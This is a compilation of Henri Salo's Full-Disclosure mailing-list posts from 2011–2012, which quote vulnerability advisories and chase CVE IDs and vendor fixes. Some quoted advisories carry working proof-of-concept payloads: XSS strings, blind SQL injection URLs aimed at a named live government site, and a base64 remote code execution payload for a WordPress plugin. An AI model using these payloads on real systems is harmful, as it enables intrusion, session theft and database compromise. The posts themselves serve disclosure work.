This looks a lot like what muuratsalo has discovered some time ago: 
http://osvdb.org/show/osvdb/76934 (there is more similar issues in OSVDB if you 
use advanced search). If I remember correctly from muuratsalo's emails he did 
get contact to vendor, but vendor did not fix all issues and wasn't 
co-operative in discussion.

Do you think NS-12-007 and NS-12-008 are new issues? If so we should request 
CVE-identifiers if these differ a lot of other XSS-issues. At the point where 
vendor does not fix issues like these nor reply I would say that people 
shouldn't be using the software at all.

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Pligg 0.9/1.x remote code execution

[Henri Salo]

On Sat, Jul 21, 2012 at 06:34:46PM +0200, BlackHawk wrote:
> Exploit attached, info inside. 2.0 versions could still be affected
> 
> http://pastebin.com/MSXFSvzA

Do you know if these issues have been fixed in some version of Pligg and if 
these have CVE-identifiers? I tried to ask this from forum.pligg.com, but my 
post was removed.

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PenTest is one year old now

[Henri Salo]

On Fri, Apr 20, 2012 at 12:54:11PM +0200, Krzysztof Marczyk wrote:
> Hello Everyone,
> 
> I have pleasure to announce that PenTest Magazine is one year old now. This
> is special time, so we decided to celebrate it. We prepared for you a
> unique 40% discount on annual subscription to PenTest Magazine. Please
> follow this link:
> http://pentestmag.com/subscribe/subscription-for-individual-subscribers/subscription-for-individual-subscribers-promo/
> and
> use this password: 40less1PROMO. Don't wait, the offer lasts only until the
> end of April 22nd!

Please stop spamming...

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Pandora FMS v4.0.1 - Local File Include Vulnerability

[Henri Salo]

On Fri, Feb 17, 2012 at 01:32:19AM +0100, resea...@vulnerability-lab.com wrote:
> Title:
> Pandora FMS v4.0.1 - Local File Include Vulnerability
> 
> Date:
> 2012-02-17
> 
> References:
> http://www.vulnerability-lab.com/get_content.php?id=435
> 
> VL-ID:
> 435
> 
> Report-Timeline:
> 2012-02-01: Vendor Notification
> 2012-02-17: Public or Non-Public Disclosure

How did vendor respond? Is this fixed by vendor?

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Advisory: sudo 1.8 Format String Vulnerability

[Henri Salo]

On Mon, Jan 30, 2012 at 02:56:26PM +0100, joernchen of Phenoelit wrote:
> Hi,
> 
> FYI, see attached.
> 
> cheers,
> 
> joernchen
> -- 
> joernchen ~ Phenoelit
>  ~ C776 3F67 7B95 03BF 5344
> http://www.phenoelit.de  ~ A46A 7199 8B7B 756A F5AC

This seems to be CVE-2012-0809 and reported to Gentoo as 
https://bugs.gentoo.org/show_bug.cgi?id=401533

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Advisory: sudo 1.8 Format String Vulnerability

[Henri Salo]

On Mon, Jan 30, 2012 at 02:56:26PM +0100, joernchen of Phenoelit wrote:
> Hi,
> 
> FYI, see attached.
> 
> cheers,
> 
> joernchen

Reported to Debian: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=657985

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

[Henri Salo]

On Wed, Jan 25, 2012 at 04:13:12PM +, Benji wrote:
> Yes it does.
> 
> wp-admin/setup-config.php?step=1 on any wp install where it exists gives
> this:
> 
> The file 'wp-config.php' already exists one level above your WordPress
> installation. If you need to reset any of the configuration items in this
> file, please delete it first.

Yes this is correct information at least with new versions of WordPress. We are 
running pretty big Linux-server in our organization and I can tell you that 
open "install me" -pages are very common and I see these as problem.

I can try to find out what went wrong with the installation or did they remove 
the WordPress-installation and didn't understand to remove everything included. 
I really hope to see this patched anyways just to be sure. I don't know what 
the actual impact in user-experience can be. Could WordPress comment?

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

[Henri Salo]

On Wed, Jan 25, 2012 at 08:43:34AM -0600, Trustwave Advisories wrote:
> The vendor was notified. They have chosen not to fix the issue at this time. 
> The Vendor Response section has the details:
> 
> Vendor Response:
> Due to the fact that the component in question is an installation script,
> the vendor has stated that the attack surface is too small to warrant
> a fix:
> 
> "We give priority to a better user experience at the install process. It is
> unlikely a user would go to the trouble of installing a copy of WordPress
> and then not finishing the setup process more-or-less immediately. The
> window of opportunity for exploiting such a vulnerability is very small."
> 
> However, Trustwave SpiderLabs urges caution in situations where the
> WordPress installation script is provided as part of a default image.
> This is  often done as a convenience on hosting providers, even in
> cases where the client does not use the software. It is a best practice
> to ensure  that no installation scripts are exposed to outsiders, and
> these vulnerabilities reinforce the importance of this step.

There is A LOT of these open installation pages in the Internet. It is not 
uncommon to leave those open by accident. Some people also do this, because 
they just don't understand the risks. I am wondering if WordPress would apply 
patch if we create one as a collaborative effort. I would be more than happy to 
help creating a patch for this if this is the case.

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] TWSL2012-002: Multiple Vulnerabilities in WordPress

[Henri Salo]

> exposed installation scripts.
> 
> 
> Vendor Communication Timeline:
> 12/22/11 - Vulnerability disclosed
> 01/16/12 - Confirmation to release vulnerabilities
> 01/24/12 - Advisory published
> 
> 
> References
> 1. http://www.wordpress.org
> 
> 
> About Trustwave:
> Trustwave is the leading provider of on-demand and subscription-based
> information security and payment card industry compliance management
> solutions to businesses and government entities throughout the world. For
> organizations faced with today's challenging data security and compliance
> environment, Trustwave provides a unique approach with comprehensive
> solutions that include its flagship TrustKeeper compliance management
> software and other proprietary security solutions. Trustwave has helped
> thousands of organizations--ranging from Fortune 500 businesses and large
> financial institutions to small and medium-sized retailers--manage
> compliance and secure their network infrastructure, data communications and
> critical information assets. Trustwave is headquartered in Chicago with
> offices throughout North America, South America, Europe, Africa, China and
> Australia. For more information, visit https://www.trustwave.com
> 
> About Trustwave's SpiderLabs:
> SpiderLabs(R) is the advanced security team at Trustwave focused on
> application security, incident response, penetration testing, physical
> security and security research. The team has performed over a thousand
> incident investigations, thousands of penetration tests and hundreds of
> application security tests globally. In addition, the SpiderLabs Research
> team provides intelligence through bleeding-edge research and proof of
> concept tool development to enhance Trustwave's products and services.
> https://www.trustwave.com/spiderlabs
> 
> Disclaimer:
> The information provided in this advisory is provided "as is" without
> warranty of any kind. Trustwave disclaims all warranties, either express or
> implied, including the warranties of merchantability and fitness for a
> particular purpose. In no event shall Trustwave or its suppliers be liable
> for any damages whatsoever including direct, indirect, incidental,
> consequential, loss of business profits or special damages, even if
> Trustwave or its suppliers have been advised of the possibility of such
> damages. Some states do not allow the exclusion or limitation of liability
> for consequential or incidental damages so the foregoing limitation may not
> apply.
> 
> This transmission may contain information that is privileged, confidential, 
> and/or exempt from disclosure under applicable law. If you are not the 
> intended recipient, you are hereby notified that any disclosure, copying, 
> distribution, or use of the information contained herein (including any 
> reliance thereon) is STRICTLY PROHIBITED. If you received this transmission 
> in error, please immediately contact the sender and destroy the material in 
> its entirety, whether in electronic or hard copy format.

These hasn't been fixed and some of these issues have been known for a while if 
you talk to users of WordPress or administrators of servers using the software. 
I am not saying that these are not real issues or anything like that. Have you 
contacted WordPress? Did they reply that they will fix these issues?

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VNC viewers: Clipboard of host automatically sent to remote machine

[Henri Salo]

On Wed, Jan 25, 2012 at 12:47:28AM +0100, Ben Bucksch wrote:
> On 25.01.2012 00:09, Dan Kaminsky wrote:
> > IP KVM, in which the foreign server basically gets only inbound 
> > Keyboard and Mouse and outbound uncompressed pixels.
> 
> That is *precisely* what VNC is: an open-source IP KVM.

What the hell? Seriously..

http://en.wikipedia.org/wiki/VNC

- Henri

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ME020567: MailEnable webmail cross-site scripting vulnerability CVE-2012-0389

[Henri Salo]

ME020567: MailEnable webmail cross-site scripting vulnerability (CWE-79)
References: CVE-2012-0389
Discovered by: Sajjad Pourali, Narendra Shinde and Shahab NamaziKhah
Vendor advisory: http://www.mailenable.com/kb/Content/Article.asp?ID=me020567
Vendor contact: 2012-01-04 09:49:36 UTC
Vendor response: 2012-01-04 10:27:13 UTC (Peter Fregon from MailEnable)
Vendor fix and announcement: 2012-01-10 00:50:31 UTC

Vulnerability description:

MailEnable <http://www.mailenable.com/> Professional and Enterprise versions 
are prone to cross-site scripting vulnerabilities as the user-supplied input 
received via "Username" parameter of "ForgottonPassword.aspx" page is not 
properly sanitized. A specially crafted URL which a user clicks could gain 
access to the users cookies for webmail or execute other malicious code in 
users browser in context of the domain in use.

Remote: yes
Authentication required: no
User interaction required: yes

Affected:

- MailEnable Professional, Enterprise & Premium 4.26 and earlier
- MailEnable Professional, Enterprise & Premium 5.52 and earlier
- MailEnable Professional, Enterprise & Premium 6.02 and earlier

Not affected:

- MailEnable Standard is not affected.

PoC:

http://example.com/mewebmail/Mondo/lang/sys/ForgottenPassword.aspx?Username='};alert(/XSS/);{'

Resolution:

Users of MailEnable 5 and 6 can resolve the issue by upgrading to version 5.53 
or 6.03 or later. Alternatively, and for version 4 users, the following fix can 
be applied:

1) Open the ForgottenPassword.aspx file in Notepad. This file is in the Mail 
Enable\bin\NETWebMail\Mondo\lang\[language] folders in version 4 and in Mail 
Enable\bin\NETWebMail\Mondo\lang\sys in version 5 and 6.
2) Locate and remove the following line, then save the file: 
document.getElementById("txtUsername").value = '<%= Request.Item("Username") 
%>';

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in Zeema CMS

[Henri Salo]

On Sun, Dec 04, 2011 at 03:00:42AM +0200, MustLive wrote:
> Hello list!
> 
> I want to warn you about Brute Force, Cross-Site Scripting and Full path
> disclosure vulnerabilities in Zeema CMS. It's Ukrainian commercial CMS.
> 
> -
> Affected products:
> -
> 
> Vulnerable are all versions of Zeema CMS.
> 
> --
> Details:
> --
> 
> Brute Force (WASC-11):
> 
> http://site/cms/
> 
> XSS (WASC-08):
> 
> http://site/search/?query=%22%20style=%22-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml%23xss)
> 
> Attack will work in Mozilla and Firefox.
> 
> Full path disclosure (WASC-13):
> 
> http://site/search/?page=10&query=site
> 
> 
> Timeline:
> 
> 
> 2011.09.12 - found vulnerabilities during audit. After that client straight
> away informed developers.
> 2011.10.22 - announced at my site.
> 2011.10.23 - informed developers.
> 2011.12.02 - disclosed at my site.
> 
> I mentioned about these vulnerabilities at my site
> (http://websecurity.com.ua/5459/).
> 
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua

Again some neverheard software. Where does one find this from internet? Is 
there a item in issue- or bug-tracker for this?

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Wordpress plugin BackWPup Remote and Local Code Execution Vulnerability - SOS-11-003

[Henri Salo]

On Mon, Mar 28, 2011 at 03:10:39PM +1100, Lists wrote:
> Sense of Security - Security Advisory - SOS-11-003
> 
> Release Date.  28-Mar-2011
> Last Update.   -
> Vendor Notification Date.  25-Mar-2010
> Product.   Wordpress Plugin BackWPup
> Platform.  Independent
> Affected versions. 1.6.1 (verified), possibly others
> Severity Rating.   High
> Impact.System Access
> Attack Vector. Remote without authentication
> Solution Status.   Upgrade to version 1.7.1
> CVE reference. Not yet assigned
> 
> Details.
> A vulnerability has been discovered in the Wordpress plugin BackWPup 
> 1.6.1 which can be exploited to execute local or remote code on the web 
> server. The Input passed to the component "wp_xml_export.php" via the 
> "wpabs" variable allows the inclusion and execution of local or remote 
> PHP files as long as a "_nonce" value is known. The "_nonce" value 
> relies on a static constant which is not defined in the script meaning 
> that it defaults to the value "822728c8d9".
> 
> Proof of Concept.
> wp_xml_export.php?_nonce=822728c8d9&wpabs=data://text/plain;base64,PGZ
> vcm0gYWN0aW9uPSI8Pz0kX1NFUlZFUlsnUkVRVUVTVF9VUkknXT8%2bIiBtZX   
> Rob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ4Ij48aW5wdXQgdHlwZT0   
> ic3VibWl0IiB2YWx1ZT0iY21kIj48L2Zvcm0%2bPHByZT48PyAKZWNobyBgeyRfUE9TVF
> sneCddfWA7ID8%2bPC9wcmU%2bPD8gZGllKCk7ID8%2bCgo%3d
> 
> Solution.
> Upgrade to version 1.7.1
> 
> Discovered by.
> Phil Taylor - Sense of Security Labs.
> 
> Sense of Security Pty Ltd
> Level 8, 66 King St
> Sydney NSW 2000
> AUSTRALIA
> T: +61 (0)2 9290 
> F: +61 (0)2 9290 4455
> W: http://www.senseofsecurity.com.au
> E: i...@senseofsecurity.com.au
> Twitter: @ITsecurityAU
> 
> The latest version of this advisory can be found at:
> http://www.senseofsecurity.com.au/advisories/SOS-11-003.pdf
> 
> Other Sense of Security advisories can be found at:
> http://www.senseofsecurity.com.au/research/it-security-advisories.php

http://osvdb.org/show/osvdb/71481
CVE-2011-4342

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] LabWiki <= 1.1 Multiple Vulnerabilitie

[Henri Salo]

On Wed, Nov 09, 2011 at 10:42:01AM +0100, muuratsalo experimental hack lab 
wrote:
> 
> LabWiki <= 1.1 Multiple Vulnerabilities
> 
> 
> author: muuratsalo (Revshell.com)
> contact...: muuratsalo[at]gmail[dot]com
> download..: http://www.bioinformatics.org/phplabware/labwiki/index.php
> 
> 
> [0x01] Vulnerability overview:
> 
> All versions of LabStore <= 1.1 are affected by multiple vulnerabilities.
> 
> 
> [0x02] Disclosure timeline:
> 
> [08/11/2011] - Multiple vulnerabilities discovered and reported to the vendor.
> [08/11/2011] - The vendor confirmed the vulnerabilities and he is
> working on fixing the reported issues.
> [09/11/2011] - Public Disclosure
> 
> 
> [0x03] Vulnerabilities:
> 
> -- Shell Upload Vulnerability --
> The upload script /edit.php improperly checks the filetype of uploaded images.
> A 'shell.php.gif' is accepted.  /* -- note that access to edit.php
> could be restricted-- */
> 
> -- Multiple Cross Site Scripting Vulnerabilities --
> http://localhost/LabWiki/index.php?from=";>alert('muuratsalo')&help=true&page=What_is_wiki
> http://localhost/LabWiki/recentchanges.php?nothing=nothing&page_no=";>alert('muuratsalo')

CVE-identifiers assigned: http://seclists.org/oss-sec/2011/q4/370

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Joomla Component (com_content) - Blind SQL Injection Vulnerability

[Henri Salo]

On Sat, Nov 12, 2011 at 12:35:35AM +0100, resea...@vulnerability-lab.com wrote:
> Title:
> ==
> Joomla Component (com_content) -  Blind SQL Injection Vulnerability
> 
> 
> Date:
> =
> 2011-11-11
> 
> 
> References:
> ===
> http://www.vulnerability-lab.com/get_content.php?id=323
> 
> 
> VL-ID:
> =
> 323
> 
> 
> Introduction:
> =
> Joomla is a free and open source content management system (CMS) for 
> publishing content on
> the World Wide Web and intranets and a model–view–controller (MVC) Web 
> application framework
> that can also be used independently.
> Joomla is written in PHP, uses object-oriented programming (OOP) techniques 
> and software design
> patterns[citation needed], stores data in a MySQL database, and includes 
> features such as page
> caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, 
> search, and support
> for language internationalization.
> Joomla had been downloaded 23 million times. Between March 2007 and February 
> 2011 there had been
> more than 21 million downloads. There are over 7,400 free and commercial 
> extensions available
> from the official Joomla! Extension Directory and more available from other 
> sources
> 
> (Copy of the Vendor Website: http://en.wikipedia.org/wiki/Joomla!)
> 
> 
> Abstract:
> =
> A vulnerability laboratory researcher discovered a Blind SQL Injection 
> vulnerability on the com_content component of the joomla CMS.
> 
> 
> Status:
> 
> Published
> 
> 
> Exploitation-Technique:
> ===
> Remote
> 
> 
> Severity:
> =
> Critical
> 
> 
> Details:
> 
> A blind SQL Injection vulnerability was detected on the com_content component 
> of the joomla CMS.
> The vulnerability allows an attacker (remote) to inject/execute own sql 
> statements on the affected application dbms.
> Successful exploitation of the vulnerability can result in compromise of the 
> affected application dbms.
> 
> Vulnerable Module(s):
> [+] com_content
> 
> 
> Proof of Concept:
> =
> The vulnerability can be exploited be remote attackers. For demonstration or 
> reproduce ...
> 
> 1: [Site]/joomla/index.php?option=com_content&view=archive&year=1 [BSQLI] 
>   
>   
> 2: [Site]/joomla/index.php?option=com_content&view=archive&year=-1 or 1=1--   
>   
>   
> 3: [Site]/joomla/index.php?option=com_content&view=archive&year=-1 or 1=0--   
> 
> 
> [x] Demo :
> 
> http://www.paul.house.gov/index.php?option=com_content&view=archive&year=-1 
> or 1=0--
> 
> 
> Risk:
> =
> The security risk of the blind sql injection vulnerability is estimated as 
> critical.
> 
> 
> Credits:
> 
> E.Shahmohamadi  (IRAN)
> 
> 
> Disclaimer:
> ===
> The information provided in this advisory is provided as it is without any 
> warranty. Vulnerability-Lab disclaims all warranties, 
> either expressed or implied, including the warranties of merchantability and 
> capability for a particular purpose. Vulnerability-
> Lab or its suppliers are not liable in any case of damage, including direct, 
> indirect, incidental, consequential loss of business 
> profits or special damages, even if Vulnerability-Lab or its suppliers have 
> been advised of the possibility of such damages. Some 
> states do not allow the exclusion or limitation of liability for 
> consequential or incidental damages so the foregoing limitation 
> may not apply. Any modified copy or reproduction, including partially usages, 
> of this file requires authorization from Vulnerability-
> Lab. Permission to electronically redistribute this alert in its unmodified 
> form is granted. All other rights, including the use of 
> other media, are reserved by Vulnerability-Lab or its suppliers.
> 
>   Copyright © 
> 2011|Vulnerability-Lab
> 
> -- 
> Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
> Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com

Did you report this to Joomla? Have you asked CVE ID?

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Steam defaced

[Henri Salo]

As I usually have good news.. Here is some more: 
http://forums.steampowered.com/forums/

Steam joins the failboat.

Regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

[Henri Salo]

On Wed, Nov 09, 2011 at 06:45:59AM -0500, Dan Rosenberg wrote:
> People seem incredulous that the bug can be triggered by sending
> traffic to closed ports.  Keep in mind that the only way your
> networking stack knows to reject packets that are directed towards
> closed ports is to do some preliminary parsing of those packets,
> namely allocating some control structures, receiving at least the
> physical/link layer frame, IP header, and transport layer header, and
> parsing out the port and destination address.  There's plenty of
> things that can go wrong before the kernel decides "this is for a port
> that's not open" and drops it, which appears to be what happened here.
>  Doesn't make the bug any less terrible, but it's not quite as
> surprising as people seem to think.

I am surprised about this, because Microsoft is definately lagging some level 
of testing and change management in critical code. How many servers are people 
using without networking these days. We do talk about remote execution 
vulnerable in something, which obviously might get unnoticed when we think of 
security audits, PCI and such. I wonder if integrated firewall in Windows could 
block this as Microsoft should do everything in their power to stop attacks in 
this security vulnerability.

Related picture: http://paste.nerv.fi/72975464-itbegins.jpeg

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Microsoft Windows vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)

[Henri Salo]

http://technet.microsoft.com/en-us/security/bulletin/ms11-083

"The vulnerability could allow remote code execution if an attacker sends a 
continuous flow of specially crafted UDP packets to a closed port on a target 
system."

Microsoft did it once again.

- Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Strange Lenovo x121e

[Henri Salo]

On Wed, Oct 05, 2011 at 07:57:03PM +, halfdog wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Hello List,
> 
> I just puchased a Lenovo x121e and just before init with random data
> and setting up the crypto disks, I found that the disk was not
> completely clean. It seems that
> 
> a) X121 ships with a dirty disk or
> b) machine was used before purchase
> 
> After reconstruction of bootsector, a NTFS partition is readable,
> pagefile.sys shows
>   COMPUTERNAME=ADMIN-THINK
> 
> Newest files in /
> dr-x--  1 root root  28672 May 29 09:45 SWDL
> - -r  2 root root   2490 May 29 09:36 ExitWinXP.bat
> dr-x--  1 root root   4096 Apr  6 13:59 WWAN1
> dr-x--  1 root root  0 Mar  1  2011 Temp
> dr-x--  1 root root  0 Jan  6  2011 $Recycle.Bin
> dr-x--  1 root root   4096 Jan  6  2011 Users
> dr-x--  1 root root  0 Jan  6  2011 Intel
> - -r  2 root root   1959 Oct  2  2010 bluetooth.txt
> 
> Funny: Might also be infected with virus, that generated sal.xls.exe
> 
> - -r  2 root root   4810 Oct 13  2007
> \346\270\205\351\231\244sal.xls.exe\347\227\205\346\257\222.bat
> 
> The non-printables seem to be UTF-8 and display as Chinese glyphs on
> other machine.
> 
> I'm complete noob in win-forensics, but at least it seems, that there
> is no evidence for other user accounts, Documents & Settings empty, so
> perhaps this could really be an authentic IBM OEM image (with virus),
> but they just replaced the boot sector to get rid of the partitions?
> 
> Since I don't want to waste too much time on dirty hardware, I did
> some googling, but found nothing of value.
> 
> 
> Does someone know of similar findings on Lenovo machines and what's
> your guess: is it worth to dig in deeper or is it just waste of time
> to recover OEM-Windows image, that was deflowered and insufficiently
> cleaned by some Chinese factory worker during lunch hours?
> 
> hd
> 
> - -- 
> http://www.halfdog.net/
> PGP: 156A AE98 B91F 0114 FE88  2BD8 C459 9386 feed a bee
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.4.6 (GNU/Linux)
> 
> iD8DBQFOjLZtxFmThv7tq+4RAjg3AJ4xCLYJqExTYk0kqLowYFdB+RU3PQCgk4yW
> zD1Qa8MoApdLGQ5Mns0wpKE=
> =UuJ/
> -END PGP SIGNATURE-
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

I have pretty new X220t and 2011-09-18 I noticed this 
http://paste.nerv.fi/59031966-strangedrivers.png when I was working as 
administrator. I didn't have any network connected (LAN, WLAN, bluetooth) nor 
USB-devices. I also did check event viewer, but didn't find anything useful. I 
didn't notice it again nor did I find any evidence of abuse. There is recovery 
partition in my model at least, which could have a big amount of executables 
and/or drivers. I also do know how to use Windows so as far as I can tell my 
laptop is pretty secure. I have firewall, IPS, anti-virus and I am not 
installing programs to my system easily :)

Please notify me if you find anything related to this issue. I would be happy 
to receive sample of sal.xls.exe. Where did you purchase your laptop?

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PunBB PHP Forum - Multiple XSS

[Henri Salo]

On Fri, Sep 16, 2011 at 06:43:47PM +0200, Piotr Duszynski wrote:
> ===
> PunBB PHP Forum - Multiple XSS
> ===
> 
> Affected Software : PunBB PHP Forum
> Severity  : Medium
> Local/Remote  : Remote
> Author: @drk1wi
> 
> [Summary]
> 
> Just for those whom it might concern.
> These vulnerabilities have been identified for the latest (clean 
> version 1.3.5) during one of my penetration tests.
> 
> [Vulnerability Details]
> 
> 
> GET 
> /login.php?action=out&id=3&csrf_token=4b072f27396cec5d79"/>alert(oink)
> GET 
> /misc.php?action=markforumread&fid=1&csrf_token=c173cabad786"/>alert(oink)
> 
> POST /delete.php?id=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_confirm=>"'>alert(oink)&delete=>"'>alert(oink)
> 
> POST /edit.php?id=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_message=>"'>alert(oink)&submit=>"'>alert(oink)
> 
> POST /login.php?action=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_email=>"'>alert(oink)&request_pass=>"'>alert(oink)
> 
> POST /misc.php?email=>"'>alert(oink)
> form_sent=>"'>alert(oink)&redirect_url=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_subject=>"'>alert(oink)&req_message=>"'>alert(oink)&submit=>"'>alert(oink)
> 
> POST 
> /profile.php?action=>"'>alert(oink)&id=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_old_password=>"'>alert(oink)&req_new_password1=>"'>alert(oink)&req_new_password2=>"'>alert(oink)&update=>"'>alert(oink)
> 
> POST /register.php?action=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_username=>"'>alert(oink)&req_password1=>"'>alert(oink)&req_password2=>"'>alert(369448)&req_email1=>"'>alert(oink)&timezone=>"'>alert(oink)®ister=>"'>alert(oink)
> 
> 
> [Time-line]
> 
> 20/08/2011 - Vendor notified
> 02/09/2011 - No e-mail reply and BAN on Forum
> ???- Vendor patch release
> 16/09/2011 - Public disclosure
> 
> [Fix Information]
> 
> 
> Cheers,
> Piotr Duszynski (@drk1wi)
> http://sharpsec.net
> 
> X. LEGAL NOTICES
> 
> Copyright (c) 2011 Piotr "drk1wi" Duszynski
> 
> Permission is granted for the redistribution of this alert
> electronically. It may not be edited in any way without mine express
> written consent. If you wish to reprint the whole or any
> part of this alert in any other medium other than electronically,
> please email me for permission.
> 
> Disclaimer: The information in the advisory is believed to be accurate
> at the time of publishing based on currently available information. Use
> of the information constitutes acceptance for use in an AS IS 
> condition.
> There are no warranties with regard to this information. Neither the
> author nor the publisher accepts any liability for any direct, 
> indirect,
> or consequential loss or damage arising from use of, or reliance on,
> this information.

CVE-2011-3371

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PunBB PHP Forum - Multiple XSS

[Henri Salo]

On Fri, Sep 16, 2011 at 06:43:47PM +0200, Piotr Duszynski wrote:
> ===
> PunBB PHP Forum - Multiple XSS
> ===
> 
> Affected Software : PunBB PHP Forum
> Severity  : Medium
> Local/Remote  : Remote
> Author: @drk1wi
> 
> [Summary]
> 
> Just for those whom it might concern.
> These vulnerabilities have been identified for the latest (clean 
> version 1.3.5) during one of my penetration tests.
> 
> [Vulnerability Details]
> 
> 
> GET 
> /login.php?action=out&id=3&csrf_token=4b072f27396cec5d79"/>alert(oink)
> GET 
> /misc.php?action=markforumread&fid=1&csrf_token=c173cabad786"/>alert(oink)
> 
> POST /delete.php?id=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_confirm=>"'>alert(oink)&delete=>"'>alert(oink)
> 
> POST /edit.php?id=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_message=>"'>alert(oink)&submit=>"'>alert(oink)
> 
> POST /login.php?action=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_email=>"'>alert(oink)&request_pass=>"'>alert(oink)
> 
> POST /misc.php?email=>"'>alert(oink)
> form_sent=>"'>alert(oink)&redirect_url=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_subject=>"'>alert(oink)&req_message=>"'>alert(oink)&submit=>"'>alert(oink)
> 
> POST 
> /profile.php?action=>"'>alert(oink)&id=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_old_password=>"'>alert(oink)&req_new_password1=>"'>alert(oink)&req_new_password2=>"'>alert(oink)&update=>"'>alert(oink)
> 
> POST /register.php?action=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_username=>"'>alert(oink)&req_password1=>"'>alert(oink)&req_password2=>"'>alert(369448)&req_email1=>"'>alert(oink)&timezone=>"'>alert(oink)®ister=>"'>alert(oink)
> 
> 
> [Time-line]
> 
> 20/08/2011 - Vendor notified
> 02/09/2011 - No e-mail reply and BAN on Forum
> ???- Vendor patch release
> 16/09/2011 - Public disclosure
> 
> [Fix Information]
> 
> 
> Cheers,
> Piotr Duszynski (@drk1wi)
> http://sharpsec.net
> 
> X. LEGAL NOTICES
> 
> Copyright (c) 2011 Piotr "drk1wi" Duszynski
> 
> Permission is granted for the redistribution of this alert
> electronically. It may not be edited in any way without mine express
